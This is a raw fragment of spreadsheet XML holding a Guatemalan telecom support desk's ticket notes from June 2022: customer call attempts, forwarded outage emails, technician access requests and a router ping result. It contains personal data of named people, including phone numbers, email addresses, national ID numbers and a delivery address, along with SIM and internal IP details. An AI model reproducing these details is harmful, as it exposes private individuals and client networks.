PARA: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; SAUL GEUSSEPE SILIEZAR LOPEZ &lt;SAUL.SILIEZAR@CLARO.COM.GT&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; MONITOREO.ENLACES@BANRURAL.COM.GT &lt;MONITOREO.ENLACES@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC-TELE-TEC@BANRURAL.COM.GT &lt;TIC-TELE-TEC@BANRURAL.COM.GT&gt;; TIC-CALLCENTER@BANRURAL.COM.G &lt;TIC-CALLCENTER@BANRURAL.COM.G&gt;; TIC ORELLANA, FRANKLIN &lt;FRANKLIN.ORELLANA@BANRURAL.COM.GT&gt;; TIC POCASANGRE, BRYAN &lt;BRYAN.POCASANGRE@BANRURAL.COM.GT&gt;; TIC NAVAS, ESVIN &lt;ESVIN.NAVAS@BANRURAL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: F4594704 || 8902254T || BANRURAL || SAN JUAN ERMITA CHIQUIMULA
BUEN DÍA
SE BRINDA ACCESO EN HORARIO DE 8:30 A 17:00 HRS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 57081768  INFORMA QUE EN UNOS 10 MINUTOS ESTARA RESPONDIENDO
 EL CORREO  ENVIADO**
-ID 3001475447
**</t>
  </si>
  <si>
    <t>*** SE ENVÍA CORREO NUEVAMENTE A CLIENTE, YA QUE NO HAY RESPUESTA AÚN DE CONFIRMACIÓN PARA PROCEDER CON LA VISITA. SE QUEDA A LA ESPERA ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 16 DE JUNIO DE 2022 7:49
PARA: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; SAUL GEUSSEPE SILIEZAR LOPEZ &lt;SAUL.SILIEZAR@CLARO.COM.GT&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; MONITOREO.ENLACES@BANRURAL.COM.GT &lt;MONITOREO.ENLACES@BANRURAL.COM.GT&gt;; 'TIC GONZÁLEZ, ANIBAL' &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC-TELE-TEC@BANRURAL.COM.GT &lt;TIC-TELE-TEC@BANRURAL.COM.GT&gt;; TIC-CALLCENTER@BANRURAL.COM.G &lt;TIC-CALLCENTER@BANRURAL.COM.G&gt;; TIC ORELLANA, FRANKLIN &lt;FRANKLIN.ORELLANA@BANRURAL.COM.GT&gt;; TIC POCASANGRE, BRYAN &lt;BRYAN.POCASANGRE@BANRURAL.COM.GT&gt;; TIC NAVAS, ESVIN &lt;ESVIN.NAVAS@BANRURAL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: F4594704 || 8902254T || BANRURAL || SAN JUAN ERMITA CHIQUIMULA
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, QUEDAMOS A LA ESPERA DE QUE NOS PUEDAN CONFIRMAR EL ACCESO A LA AGENCIA. ELLO PARA PODER VALIDAR EL SERVICIO DE DATOS PRINCIPAL. ADJUNTO NUEVAMENTE DATOS DE PERSONAL QUE SE HARÁ PRESENTE:
BORJA RIOS BERI ZURIEL 520338 2711404451301
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4594709</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KENDER AL 5853-7922  NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
ID 2001129258
**</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE OPERADORA INDICA QUE NO SE ENCUENTRA NUMERO DISPONIBLE.</t>
  </si>
  <si>
    <t>SE LLAMA KENDER -5853-7922  RESPONDE PERO NO ESCUCHA LLAMADA, SE ESCUCHA RUIDO AMBIENTAL Y CORTA LLAMADA.---
SE INTENTA SEGUNDA OCASION PERO ENVIA A BUZON---</t>
  </si>
  <si>
    <t>SE LLAMA A LIENTE  FREDY RIOS 58537802 MENCIONA QUE EL INCONVENIENTE PERSISTE
-ID 2001304327
NOMBRE DEL CLIENTE: CREDIEXPRESS SOCIEDAD ANONIMA-
UBICACIÓN:BANCO FICOSA MEDIA CUADRA AL ESTE Y MEDIA CUADRA AL SUR
CONTACTO EN SITIO: FREDY RIOS 58537802
HORARIO DE ATENCION: VISITA PARA MAÑANA A PARTIR DE LAS 8
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KENDER AL 5853-7922  NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
ID 2001125690
**</t>
  </si>
  <si>
    <t>F4594715</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SCARLET MANZANERO 41753805 PARA BRINDAR RETROALIMENTACION PERO NO RESPONDE
-ID 2001163202</t>
  </si>
  <si>
    <t>F4594722</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ANDREA AL 53442402 NO RESPONDE | ENVIA A BUZON | SE INTENTARA LUEGO **
-ID 2001130495
**</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE BORIS, ESTARA SOLICITANDO INSPECCION U OTRO MEDIO DE RESPALDO PARA EL SERVICIO POR MEDIO DEL EJECUTIVO DE CUENTA PORQUE CADA VEZ QUE SE VA LA ENERGIA SE QUEDAN SIN SERVICIO INCLUSO CON EL RESPALDO DE CORRIENTE QUE SE TIENE.  SOLICITA SE LE ENVIE CORREO Y SE LE DEJE EN MONITOREO HASTA EL DIA DE MAÑANA 10/06  A LAS 12:00 HORAS.
NÚMERO: 011 50244992910
FIN: HOY, 09:09
ID DE LLAMADA: 2001146718</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ANDREA AL 53442402 CONFIRMA SERVICIO ESTABLE Y OPERATIVO  **
-ID 2001147065
**</t>
  </si>
  <si>
    <t>F4594723</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESTEBAN GUDIEL 23049696 EXT 01 NO RESPONDE || SE INTENTARA LUEGO **
ID 2001216976
**</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONO ANTERIOR INDICA ENLACE EN MONITOREO PARA MAÑANA A LAS 08:00AM A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>F4594754</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 8 DE JUNIO DE 2022 18:52
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; HERNANDEZ CERVANTES SANTIAGO RAUL &lt;SHCERVAN@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100022T ::: TICKET CNOC IMBBL004170 ::: "LINK DOWN"
BUENAS TARDES ESTIMADOS (A):
COMO PARTE DEL SEGUIMIENTO AL CASO ID LOCAL 426100022T ::: TICKET CNOC IMBBL004170 ::: "LINK DOWN", SOLICITAMOS DE SU AMABLE APOYO PARA VALIDAR SI AÚN PERSISTEN LOS INCONVENIENTES PLANTEADOS. SE OBSERVA ENLACE ALCANZABLE A NIVEL DE PING CON BGP ESTABLECIDO. SALUDOS CORDIALES. GRACIAS.
FIGURA 1, ENLACE OPERATIVO ALCANZABLE A NIVEL DE PING CON BGP ESTABLECIDO.</t>
  </si>
  <si>
    <t>F4594770</t>
  </si>
  <si>
    <t>SE TIENE CORREO TAMBIEN POR PARTE DEL CLIENTE, CON DATOS SOLICITADOS PARA ENVIO DE SIM, SE QUEDA A ESPERA DE RESPUESTA POR PARTE DE COMERCIAL
DE: YPINEDA@INNOVATELCO.NET &lt;YPINEDA@INNOVATELCO.NET&gt;
ENVIADO: JUEVES, 9 DE JUNIO DE 2022 11:00
PARA: PERLA MARISOL ARCHILA VASQUEZ &lt;PERLA.ARCHILA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
CC: JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; ANA MARLENE ARDON PEREZ AGUILAR &lt;ANA.ARDON@CLARO.COM.GT&gt;; VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;; CHETE CHAJON, JAVIER DANILO &lt;JAVIER.CHETE@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; 'SOPORTE INNOVA TELECOMUNICACIONES' &lt;SOPORTE@INNOVATELCO.NET&gt;; LGUZMAN@INNOVATELCO.NET &lt;LGUZMAN@INNOVATELCO.NET&gt;; 'BRYAN IVAN VALLEJO CABRERA' &lt;BVALLEJO@INNOVATELCO.NET&gt;
ASUNTO: RE: SEGUIMIENTO INCIDENTE ID: 863400396 INNOVA
HOLA PERLA,
CON GUSTO,
NOMBRE DE CONTACTO: YELTZIN FERNANDO PINEDA ALFARO
NUMERO DE CONTACTO: +502 3271-9734
DIRECCIÓN DE ENTREGA: RUTA 5 3-16 ZONA 4 CIUDAD GUATEMALA (ATRÁS DE GASOLINERA SHELL Y A UN COSTADO DE RADIADORES PORTOCARRERO)
UBICACIÓN: HTTPS://GOO.GL/MAPS/MEFVEMT73WZ2MKWU7
CUALQUIER DUDA O CONSULTA ESTARÉ AL PENDIENTE.
SALUDOS</t>
  </si>
  <si>
    <t>CORREO ENVIADO A ESPERA DE RESPUESTA.</t>
  </si>
  <si>
    <t>HAY CORREO RESPUESTA DEL ÁREA COMERCIAL CON LA SIGUIENTE INFORMACIÓN, SE PIDE APOYO A GESTIÓN N1:
DE: PERLA MARISOL ARCHILA VASQUEZ [MAILTO:PERLA.ARCHILA@CLARO.COM.GT]
ENVIADO EL: MIÉRCOLES, 29 DE JUNIO DE 2022 16:19
ASUNTO: SEGUIMIENTO INCIDENTE ID: 863400396 INNOVA
BUENA TARDE ESTIMADOS
POR PARTE DEL ÁREA REALIZARON LA ACTUALIZACIÓN DE IP SEGÚN LO SOLICITADO, FAVOR DE REALIZAR PRUEBAS CON CLIENTE PARA VALIDAR EL FUNCIONAMIENTO DEL SERVICIO.
TEL: 50242123015
SIM: 8950201021997504916F
WAN:   10.255.170.57
APN: INNOVA.CLARO</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE YELSIN, CONFIRMA LOS SIGUIENTES DATOS:
DIRECCIÓN: RUTA 5, 3-16 ZONA 4, ATRAS DE GASOLINERA SHELL.
CONTACTO EN SITIO: YELSIN PINEDA TELÉFONO: 32719734
PERMISOS: NO ES NECESARIO
HORIRIO A 8:00  A 18:00 HORAS
NÚMERO: 011 50232719734
FIN: HOY, 10:51
ID DE LLAMADA: 2001186537</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE YELSIN PÍNEDA, INDICA QUE NO SE EL HA CONTACTADO PARA SEGUIMIENTO Y SOLICITA AVANCES
NÚMERO: 011 50232719734
FIN: HOY, 10:17
ID DE LLAMADA: 2001174177</t>
  </si>
  <si>
    <t>F4594788</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEXANDER AL 58981003 INDICA QUE SE LE LLAME A LAS 14:30 PARA CONFIRMAR YA QUE HASTA LAS 14:00 HRS ENTRAN A TRABAJAR**
-ID 2001125313
**</t>
  </si>
  <si>
    <t>SE HABLÓ CON BORIS LUTIN/CLIENTE 44992910 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET, SE LE CONSULTA SI ES NECESARIO HABLAR CON PR, INDICA QUE NO.</t>
  </si>
  <si>
    <t>F4594791</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWARD CANTE AL 32140699 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 2001130838
**</t>
  </si>
  <si>
    <t>F4594799</t>
  </si>
  <si>
    <t>***--- CL AUTORIZA CIERRE DE SD ---*
DE: BRUGADA HERNANDEZ DANIEL [MAILTO:DBRUGADA@UNINET.COM.MX]
ENVIADO EL: JUEVES, 9 DE JUNIO DE 2022 04:22
PARA: ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GODINEZ MYURY FRIDA IRAIS &lt;FGMYURY@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100029T :: TICKET CNOC IMBBL004174 ::: "FUERA DE SERVICIO"
ESTIMADOS, SERVICIO OPERATIVO, PUEDEN PROCEDER AL CIERRE. SSALUDOS</t>
  </si>
  <si>
    <t>F4594848</t>
  </si>
  <si>
    <t>**SE LLAMO A CLIENTE OTTO PERALTA AL 54136232  - 47703256 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001132969
**</t>
  </si>
  <si>
    <t>**SE LLAMO A CLIENTE OTTO PERALTA AL 54136232  - 47703256 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001145888 - 2001146047
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OTTO PERALTA 54136232  NO RESPONDE, SE INTENTARA LUEGO
-ID 2001165656</t>
  </si>
  <si>
    <t>F4594860</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AURA VARGAS AL 30146365 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001133669
**</t>
  </si>
  <si>
    <t>F4594864</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE NOE MAS AL 30014524 SOLICITA QUE SE LE LLAME A LAS 9:30 YA QUE REALIZARAN PRUEBAS  **
-ID 2001134528
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE NOE MAS AL 30014524  CONTESTA LA SEÑORITA E INDICA QUE SE LE LLAME EN 15 MIN  **
-ID 2001162459
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NOE 30014524 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001169780</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE NOE MAS AL 30014524 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001125963
**</t>
  </si>
  <si>
    <t>F4595025</t>
  </si>
  <si>
    <t>SE HABLÓ CON MONTSERRAT GARRIDO/CLIENTE 00 525551745299 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 00 525551745299 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE; ADICIONAL SE LE PIDE APOYO VÍA CORREO:
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCSCT0001IN-TDA::: TICKET CNOC IMSCI002999 ::: "PERDIDA DE PAQUETES "</t>
  </si>
  <si>
    <t>***--TELMEX CONSULTA SI SE PRESENTARON EVENTOS EN EL BACKBONE--**
DE: LAZCANO MEJIA IRVIN YAIR [MAILTO:ILMEJIA@UNINET.COM.MX]
ENVIADO EL: JUEVES, 9 DE JUNIO DE 2022 03:11
PARA: IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCSCT0001IN-TDA::: TICKET CNOC IMSCI002999 ::: "PERDIDA DE PAQUETES "
ESTIMADOS, BUEN DÍA,
GRACIAS POR SUS COMENTARIOS. ¿NOS PODRÍAN APOYAR VALIDANDO SI SE PRESENTÓ ALGÚN EVENTO DENTRO DE SU BACKBONE? OBSERVAMOS PÉRDIDAS DE PAQUETES Y PICOS DE LATENCIA.
QUEDAMOS ATENTOS.
SALUDOS CORDIALES | KIND REGARDS | SAUDAÇÕES</t>
  </si>
  <si>
    <t>F4595098</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5299 INDICA QUE YA TIENEN EL TICKET CERRADO POR FALTA DE ENERGIA
-ID 2001167443</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 9 DE JUNIO DE 2022 9:57
PARA: IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 1525981OH ::: TICKET CNOC IMGMD005287 ::: "ENLACE FUERA DE SERVICIO"
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4595170</t>
  </si>
  <si>
    <t>CLIENTE EVELYN ALVAREZ 54829794 VALIDA QUE EL E1 YA SE ENCUENTRA OPERATIVO, INDICA QUE RESOLVIERON EL INCONVENIENTE EN SU RED INTERNA. A NIVEL DE CLARO SIN INCONVENIENTES. AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 2001127979</t>
  </si>
  <si>
    <t>F4595191</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN INGRESA LA LLAMADA POSIBLEMENTE CLIENTE POSEE UN DESVIO COLOCADO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE
SD1133498 / F4595191 / GDN 23399050 / INDUSTRIAS DE MATERIALES DECORATIVOS, S.A. / ID 573900004T
MONICA YIREH CASTILLO POON
BUENOS DÍAS ESTIMADO,
REFERENTE AL REPORTE REALIZADO PARA LA REVISIÓN DEL GDN 23399050.
LE COMENTAMOS QUE ACTUALMENTE NO SE TIENE LINK DE FIBRA ÓPTICA EN LOS EQUIPOS DE ULTIMA MILLA, QUISIÉRAMOS CONSULTARLE SI YA REALIZARON EL REINICIO Y VALIDACIÓN DE CONEXIONES TANTO DEL EQUIPO CISCO COMO EL EQUIPO DE MARCA CTC.
EN DADO CASO, YA FUERON REALIZADAS LAS PRUEBAS FAVOR CONFIRMARNOS POR ESTE MEDIO PARA COORDINAR PERSONAL TÉCNICO A LAS INSTALACIONES PARA LA REVISIÓN DEL SERVICIO.
ADICIONAL, FAVOR CONFIRMARNOS SI EL SERVICIO POSEE ALGÚN DESVIÓ COLOCADO EN ESTE MOMENTO YA QUE AL MOMENTO DE REALIZAR LLAMADAS DE PRUEBA LA LLAMADA SI ESTA DANDO TONO.
SALUDOS,</t>
  </si>
  <si>
    <t>##SE TIENE A CLIENTE EN LINEA ##SE DIRIGE HACIA EQUIPOS##</t>
  </si>
  <si>
    <t>AUN NO SE TIENE RESPUESTA DE PARTE DEL CLIENTE VIA CORREO
SE CONTACTA CON CLIENTE HARED 42161050 PARA REALIZAR PRUEBAS CON EL SERVICIO PERO NO RESPONDE NUEVAMENTE
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4595193</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DE LA CENTRAL (52) 55 51 74 52 99 ID: 2001190914 ATIENDE ILEA RAMOS Y SOLICITA TIEMPO DE ESPERA, RETOMA LLAMADA Y APOYA VERIFICANDO, VALIDA SERVICIO OK Y AUTORIZA EL CIERRE DEL TICKET*/*/*/SE NOTIFICA A GESTOR JOSE.OCHOA PARA QUE PROCEDA AL CIERRE DE LA F4595193, SE CAMBIA DE ESTADO*/*/*/</t>
  </si>
  <si>
    <t>F4595196</t>
  </si>
  <si>
    <t>SE PLATICA CON ANA CAROLINA DONDE NOS INFORMA QUE LOS TÉCNICOS SE ENCONTRARAN DENTRO DE 45 MINUTOS EN EL PR
2001164526
COLA:
NOMBRE: A: 50433915065
NÚMERO: 50433915065
DURACIÓN: 0:01:16
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50433915065
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.CORADO
FECHA Y HORA LOCALES: 9/06/2022 09:52:07</t>
  </si>
  <si>
    <t xml:space="preserve"> **SE LLAMA A CLIENTE SR. CESAR DIAZ 99919175 CLIENTE NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001241297
**</t>
  </si>
  <si>
    <t>F4595217</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS###
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: JUEVES, 9 DE JUNIO DE 2022 9:37
PARA: WCHAVARRIA@BANCATLAN.HN &lt;WCHAVARRIA@BANCATLAN.HN&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | 1030344OH |OH1000607933/BANCO ATLANTIDA S A - | LA GRECIA MARCOVIA, CHOLUTECA, KM 21 CARRETERA A CEDEÑO. 13.242451, -87.353888
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO   1030344OH   |OH1000607933/BANCO ATLANTIDA S A  - | LA GRECIA MARCOVIA, CHOLUTECA, KM 21 CARRETERA A CEDEÑO.  13.242451, -87.353888
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
          NOMBRE                                                        ID
 NELSON OMAR ORELLANA AVILA          0801.1976.06689
YEFRI ARAEL OSORTO RODRIGUEZ         0601-2002-02369
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE PROCEDE  A LLAMAR A CLIENTE PARA VALIDAR SI SE REALIZARON DESCARTES DE PRIMER NIVEL Y EN DADO CASO  SOLICITAR DATOS-
WENDY INDICA QUE ES UN ATM Y UNICAMENTE ESTUVO ACTIVO EL SERVICIO DURANTE UN TIEMPO Y NUEVAMENTE PRESENTARON FALLA--</t>
  </si>
  <si>
    <t>F4595223</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAIRO 89089776 INDICA QUE YA LE DIERON INGRESO AL TECNICO **
-ID 2001298740
**</t>
  </si>
  <si>
    <t>NO SE TIENE RESPUESTA DE TECNICO
2001696121
COLA:
NOMBRE: A: 50587348371
NÚMERO: 50587348371
DURACIÓN: 0:00:15
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 50587348371
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 12/06/2022 07:51:53</t>
  </si>
  <si>
    <t>&lt;SBLUNIB0N1T1D1A01EID1&gt;PING -C 1509 -M 30 -B -VPN-INSTANCE MPLS_POLICIA 10.15.128.21
  PING 10.15.128.21: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.15.128.21 PING STATISTICS ---
    1509 PACKET(S) TRANSMITTED
    1509 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/2/21 MS
&lt;SBLUNIB0N1T1D1A01EID1&gt;
SE DETIENEN ESCALACIONES SERVICIO ARRIBA</t>
  </si>
  <si>
    <t>POROCEDER CON RESOLVER INCIDENTE</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAIRO  AL PR 89089776  SIGUE SIN RESPONDER || ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 2001253614
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAIRO  AL PR 89089776  NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 2001242498
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAIRO 89089776  SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001262950</t>
  </si>
  <si>
    <t>F4595229</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXANDER MONTANO 70001417 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001349827</t>
  </si>
  <si>
